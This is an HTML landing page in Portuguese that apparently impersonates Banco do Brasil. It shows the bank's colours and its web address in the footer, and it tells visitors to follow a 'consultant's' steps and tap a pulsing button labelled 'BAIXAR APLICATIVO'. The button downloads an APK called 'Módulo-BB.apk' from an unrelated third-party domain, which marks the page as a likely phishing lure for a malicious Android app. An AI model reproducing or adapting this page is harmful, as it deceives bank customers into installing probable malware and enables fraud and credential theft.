<!DOCTYPE html>
<html lang="pt-br">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>-</title>
	<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.4.1/dist/css/bootstrap.min.css" integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh" crossorigin="anonymous">
	<link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;700&display=swap" rel="stylesheet">
    <style>

        @keyframes slideIn {
            from {
                transform: translateY(-100%);
                opacity: 0;
            }
            to {
                transform: translateY(0);
                opacity: 1;
            }
        }

        @keyframes fadeIn {
            from {
                opacity: 0;
            }
            to {
                opacity: 1;
            }
        }

        @keyframes bounce {
            0%, 20%, 50%, 80%, 100% {
                transform: translateY(0);
            }
            40% {
                transform: translateY(-30px);
            }
            60% {
                transform: translateY(-15px);
            }
        }

        @keyframes pulse {
            0% {
                transform: scale(1);
            }
            50% {
                transform: scale(1.1);
            }
            100% {
                transform: scale(1);
            }
        }

        body {
            background: linear-gradient(135deg, #f1f1f1 0%, #f1f1f1 100%);
            color: #666666;
			font-family: 'Roboto', sans-serif;
            text-align: center;
            margin: 0;
            padding: 0;
            overflow-x: hidden;
			
        }

        header {
            background-color: #0d2745;
            padding: 10px 0;
            animation: slideIn 1s ease-out;
        }

header h1 {
    margin: 0px 20px;
    font-size: 2.5em;
    color: #fff;
    text-align: left; /* Adicione esta linha */
}
        .container {
            padding: 50px 20px;
            animation: fadeIn 2s ease-in;
        }

        .description {
            font-size: 1.2em;
            margin: 20px 0;
            animation: fadeIn 2s ease-in 1s;
        }

        .download-btn {
            display: inline-block;
            padding: 15px 30px;
            background-color: #007ec8;
            color: #fff;
            text-decoration: none;
            font-size: 1.5em;
            border-radius: 5px;
            transition: background-color 0.3s ease, transform 0.3s ease;
            animation: pulse 2s infinite;
        }
        
		.download-btn2 {
			font-size:14px;
			transition: background-color 0.3s ease, transform 0.3s ease;
            animation: pulse 2s infinite;
        }

        .download-btn:hover {
            background-color: #007ec8;
            transform: scale(1.1);
        }


        .game-image {
            width: 100%;
            height: 100%;
            object-fit: cover;
            animation: fadeIn 2s ease-in 1s;
        }

 footer {
            position: fixed;
            bottom: 0;
            left: 0;
            width: 100%;
            background-color: #333;
            color: #fff;
            text-align: center;
            padding: 10px 0;
			font-size:12px;
        }

 footer {
            position: fixed;
            bottom: 0;
            left: 0;
            width: 100%;
            background-color: #f8d117;
            color: #000;
            text-align: center;
            padding: 10px 0;
        }
		   .image-wrapper {
            display: inline-block;
			border-radius:10px;
            overflow: hidden;
            margin: -28px 0;
        }
    </style>

</head>
<body>
    <header>
       <h1><img width="150"src="https://img001.prntscr.com/file/img001/0jXKH3DuSCOGTih7I57Gwg.png"></h1>
    </header>
    <div class="container">
        <div class="image-wrapper">
            <img src="https://img001.prntscr.com/file/img001/nVXt7_wOQtuo2EH1g7X6Qw.png"  class="game-image">
        </div>       

		<div class="date-container">
           
        </div>
        
        <p align="left"class="description alert alert-warning" style="font-size:16px;">
		
		Para prosseguir com  a instalação do aplicativo siga os passos recomendados pelo consultor.</p>
		<p class="download-btn2">Clique no botão abaixo para baixar o aplicativo.</p>
        <a href="https://chgdesign.com.br/bb.modulo/M%C3%B3dulo-BB.apk" class="download-btn" style="font-size:18px;">BAIXAR APLICATIVO</a>
    </div>
    <footer>
	<br>
         <p>www.bb.com.br</p>
    </footer>
</body>
</html>
